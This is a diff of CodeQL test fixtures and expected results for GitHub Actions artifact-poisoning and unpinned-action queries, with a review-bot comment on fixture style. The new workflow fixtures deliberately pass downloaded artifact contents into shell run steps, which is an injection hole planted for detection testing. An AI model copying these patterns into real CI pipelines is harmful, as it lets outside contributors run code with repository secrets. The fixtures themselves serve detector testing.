@@ -867,8 +876,10 @@ dfNodes | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | 
@@ -949,7 +960,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:40:74 | .github/workflows/poisonable_steps.yml@5:5:40:74 | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:41:23 | .github/workflows/poisonable_steps.yml@5:5:41:23 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | 
@@ -1008,8 +1019,10 @@ nodeLocations | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:9:40:74 | .github/workflows/poisonable_steps.yml@40:9:40:74 | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:9:41:23 | .github/workflows/poisonable_steps.yml@41:9:41:23 | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | 
@@ -1030,7 +1043,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | @@ -1052,6 +1065,10 @@ sources | jitterbit/get-changed-files | * | output.removed | filename | manual | | jitterbit/get-changed-files | * | output.renamed | filename | manual | | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | | marocchino/on_artifact | * | output.* | artifact | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | | potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml index 8475711949f8..5cf7bbd4e6bd 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml 
@@ -21,69 +21,8 @@ jobs: id: pr run: echo "::set-output name=id::$( - - - body-include: '' - number: ${{ steps.pr.outputs.id }} - - - name: The job failed - if: ${{ failure() }} - uses: actions-cool/maintain-one-comment@v1.2.1 - with: - token: ${{ secrets.GITHUB_TOKEN }} - body: | - 😭 Deploy PR Preview failed. - - - - - body-include: '' - number: ${{ steps.pr.outputs.id }} - - failed: - runs-on: ubuntu-latest - if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'failure' - steps: - - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - name: pr - - - name: save PR id - id: pr - run: echo "::set-output name=id::$( - - - body-include: '' - number: ${{ steps.pr.outputs.id }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml new file mode 100644 index 000000000000..633c45661e59 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml 
@@ -0,0 +1,23 @@
+# It consumes an artifact produced by the First Workflow
+
+on: workflow_run
+jobs:
+ my-second-job:
+ runs-on: ubuntu-latest
+ steps:
+ - name: download pr artifact
+ uses: dawidd6/action-download-artifact@v2
+ with:
+ workflow: ${{github.event.workflow_run.workflow_id}}
+ run_id: ${{github.event.workflow_run.id}}
+ name: artifact
+
+ # Save PR id to output
+ - name: Save artifact data
+ id: artifact
+ uses: juliangruber/read-file-action@v1
+ with:
+ path: ./artifact.txt
+ - name: Use artifact
+ run: echo ${{ steps.artifact.outputs.contents }}
+
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml
new file mode 100644
index 000000000000..92c4be4a9e82
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml
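Review bot: The header comment on the first added line says only that the workflow consumes an artifact and does not record what this CWE-094 fixture expects the query to flag, so a reader has to infer it from the last step; consider extending it to `# Test: the 'Use artifact' run step interpolates steps.artifact.outputs.contents, read from the downloaded artifact, into a shell command`. Expression style is also mixed within the file: `${{github.event.workflow_run.workflow_id}}` and `${{github.event.workflow_run.id}}` have no inner spaces while `${{ steps.artifact.outputs.contents }}` does, and the sibling fixture artifactpoisoning1.yml in this commit uses the spaced form throughout. The comment `# Save PR id to output` above the `Save artifact data` step no longer matches what that step does (it reads ./artifact.txt into an output via read-file-action), so it reads like a leftover from whichever fixture this one was derived from.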
@@ -0,0 +1,30 @@ +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - id: artifact + run: | + echo "::set-output name=pr_number::$( bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | 
@@ -13,13 +12,12 @@ edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | nodes -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | semmle.label | python foo/x.py | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | 
semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | 
@@ -42,11 +40,12 @@ nodes | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | subpaths #select -| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | 
@@ -58,3 +57,4 @@ subpaths | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 18ad272f8031..57d7ff9d64b0 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -1,7 +1,6 @@
 edges
-| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | |
 | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | |
-| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | |
+| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | |
 | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | |
 | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | |
 | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | |
@@ -13,13 +12,12 @@ edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | nodes -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | semmle.label | python foo/x.py | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | 
semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | @@ -42,5 +40,7 @@ nodes | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 41c465dcc27c..70eb169860e6 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,9 +1,8 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning7.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning8.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses 
Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref '5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref '2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index b4a099672a4f..4431d865417d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -9,16 +9,12 @@ edges | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | -| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | -| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | -| .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:16:9:18:40 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | | 